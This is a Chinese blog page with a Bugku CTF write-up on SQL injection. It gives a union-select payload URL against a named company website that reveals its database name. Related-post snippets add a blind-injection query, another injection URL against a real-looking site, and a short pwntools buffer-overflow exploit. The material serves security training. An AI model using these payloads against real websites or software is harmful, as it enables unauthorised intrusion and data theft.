bugku ctf 实战2-注入

最新推荐文章于 2025-05-15 17:46:59 发布
原创 最新推荐文章于 2025-05-15 17:46:59 发布 · 2.7k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细记录了一次CTF比赛中的SQL注入过程,从发现注入点到利用联合查询获取数据库名,再到盲注获取表名,最终揭示了表名为'tbnomax'并解出flag。通过实例展示了SQL注入的常见手法和防御思路。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 

 

 进去之后发现       wtf!?

 

 

这个怎么可以注入  !??????

经过不断的点击发现

 

 

有注入点  哈哈哈哈哈 这样就简单了  按正常步骤来   

 

正常的数字型注入  

利用联合查询  

http://www.kabelindo.co.id/readnews.php?id=24%20and%201=2%20union%20select%201,database(),3,4,5%23

爆出数据库为 u9897uwx_kabel

最低0.47元/天 解锁文章

200万优质内容无限畅学
Bugku Web CTF-sql注入2
No Title
01-14 790
这道题过滤了许多关键字,包括但不限于select、union、and、or等,还有许多符号比如注释符--,,、#等(需要注意的是这里的过滤是指针对uname字段的过滤)。 一开始没什么思路,于是参考网上其他人写的wp,发现主要集中于以下两种解法: 用扫描工具扫出存在的漏洞,即.DS_STORE泄漏问题,然后获取对应的文件目录,可以看到目录下有flag文件。 灵光一闪,直接猜出目录下有admin或...
bugku ctf 实战1-注入
qq_42777804的博客
08-17 745
打开之后,是这么一个网站   需要找到可以注入的网页 经过笔者的不断努力  终于自己给找了出来。。。(其实御剑可以直接扫出来的)     之后再点击这里      之后就会有这个注入点   http://www.interplay.com/support/support.php?id=374 常规注入发现是数字型 http://www.interplay...
bugku-实战2-注入
偷一个月亮
06-29 359
news存在注入点,4个字段 select tables 发现表太多了,显示不全 这时用字符截断函数 get flag
CTF Web BugKu sql注入(布尔盲注+绕过)
最新发布
2301_79806187的博客
05-15 1003
尝试username=admin,显示“password error!尝试username=hhh,显示“username does not exist!尝试username=hhh'or'1显示“password error!”,那么注入点在username中,布尔盲注。构建注入语句的时候发现还会回显illegal character,说明有过滤。利用bp和sql字符过滤字典初步筛选出过滤的字符,如下图后来尝试的时候又发现了for也被过滤了。我的思路:布尔盲注的两个关键点就是截取字符串和比较。
BugkuCTF sql注入
weixin_34413065的博客
05-04 388
前言 写了这么久的web题,算是把它基础部分都刷完了一遍,以下的几天将持续更新BugkuCTF WEB部分的题解,为了不影响阅读,所以每道题的题解都以单独一篇文章的形式发表,感谢大家一直以来的支持和理解,共勉~~~ 点开链接一看 很明显可以看出查询key表,id=1的string字段 我们去构造payload: http://103.238.227.13:10083/inde...
BugkuCtf-pwn2-exp
weixin_30340745的博客
08-22 414
#!/usr/bin/env python from pwn import * p = process('./pwn2') payload = 'a' * 56 + p64(0x400751) p.recvuntil('?') p.sendline(payload) print p.recvall() 转载于:https://www.cnblo...
实战2-注入
WYJ____的博客
08-03 599
主页面无论输入什么都不显示错误,进去下面这个页面,会有报错信息。 联合查询、报错两种方法爆出来的表不完整,,所以用布尔型盲注的方法。   /?id=24 and (select count(table_name) from information_schema.tables where table_schema='u9897uwx_kabel') =22 %23  //22张表 /?...
BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-7.zip
12-07
【标题】"BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-7.zip" 指的是2021年BugKu网络安全平台举办的AWD(Attack-Defend,攻防)CTF(Capture The Flag,夺旗)排位赛的实战题目,其中的"7"可能代表该赛事的第七个...
bugkuctf解题-WEB
05-04
总的来说,"bugkuctf解题-WEB"涉及的是Web安全的实战应用,需要对Web开发、网络安全有深入的理解,并具备问题解决和创新思维能力。通过不断地学习和实践,我们可以不断提升自己的技能,与更多的人交流分享,共同进步...
Bugku CTF梳理
lin的博客
04-10 1502
大佬的刷题记录:https://blog.youkuaiyun.com/mcmuyanga 1.CTF常见题型 CTF比赛通常包含的题目类型有七种,包括MISC、PPC、CRYPTO、PWN、REVERSE、WEB、STEGA。 MISC(Miscellaneous)类型,即安全杂项,题目或涉及流量分析、电子取证、人肉搜索、数据分析等等。 PPC(Professionally Program Coder)类型,即编程类题目,题目涉及到编程算法,相比ACM较为容易。 CRYPTO(Cryptography)
bugku--SQL注入((利用脚本))
hxhabcd123的博客
08-28 2011
本文记录利用脚本来解决SQL注入CTF
bugku sql注入2
rommel的博客
08-28 1459
sql注入2 190 http://120.24.86.145:8007/web2/ 全都tm过滤了绝望吗? 提示 !,!=,=,+,-,^,% 这题懵逼了好久,额 最后我就瞎试下 在网址后价格flag 就得到了。。。。。。。。。。。。。。 excuse me????
Bugku SQL注入2
小白渣的博客
09-18 876
这道题目属实有点牛逼 1.直接 即可得到 flag 2.这加粗样式道题属于典型的DS_Store源码泄露,当然还有其他类型(常见web源码泄露总结)(常见的web源码泄露总结). 结果用御剑和bp爆口令好像都无果 ...
BugkuCTF web sql注入2
H4ppyD0g的博客
02-08 639
页面post方式提交表单; 所有按钮都不好用; f12检查看到action到login.php,访问一下,username和password都需要填写; 输入用户名直接提交提示用户名和密码都需要填写; 后台扫描没有结果; 经过一些列输入测试,判断admin就是用户名,但是密码不知道; 初步判断为post提交sql注入,'单引号验证一下 admin' -- # 判断应该就是这道题目就是考察的sql注...
Bugku:web INSERT INTO注入
qq_26961571的博客
09-09 246
打开之后, ​ 发现了一串代码,而这串代码就是php。一看这么多,我其实还是很有畏难情绪的,感觉脑壳都大了。但是怎么办,还是得硬上啊!!都已经啃到这里了,现在放弃也太可惜了吧其实最近思虑很多,感觉没有未来。每次都说那能怎么办呢??是啊,能怎么办呢?只能尽全力去想去做,但是真的好累。我又是缺乏安全感的人,要通过自己的努力调节情绪,已经不止一次想过要放弃了,放弃是多么简单的事情,比鼓起勇气的死亡还要简单的多。 回到正题,仔细分析一下代码。 error_reporting(0);​funct..
BugKu之sql注入
D-R0s1的博客
08-08 990
       今天和大家分享一道BugKu中关于sql注入的题目,在web题中,sql注入的相关知识可以说随处可见了,在这里咱们就就题论题不做其他的拓展和延伸了。        拿到题以后,还是老套路,and 1=1和and 1=2 看看是否带入查询,但是这个题目在?id=1和?id=1'两种条件下都不报错,查看页面源代码发现gb2312于是尝试宽字节注入。?id=1%bf' union sel...
bugku-Web-sql注入2(.DS_Store文件泄漏)
Sea_Sand息禅
03-31 1047
泄露扫描脚本下载目录:https://github.com/lijiejie/ds_store_exp .DS_Store文件泄漏脚本扫描: 这些文件脚本已经给我们下载保存了,直接访问flag文件得到flag。 ...
2021 BugKu CTF AWD排位赛真题解析
通过参与BugKuCTF比赛,参与者可以在模拟的实战环境中锻炼自己的技术,提高解决实际问题的能力。 在本资源中,题目“S2 AWD排位赛-13.zip”表明这是一系列AWD竞赛中的第13个挑战。压缩包内包含的文件名称列表显示...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值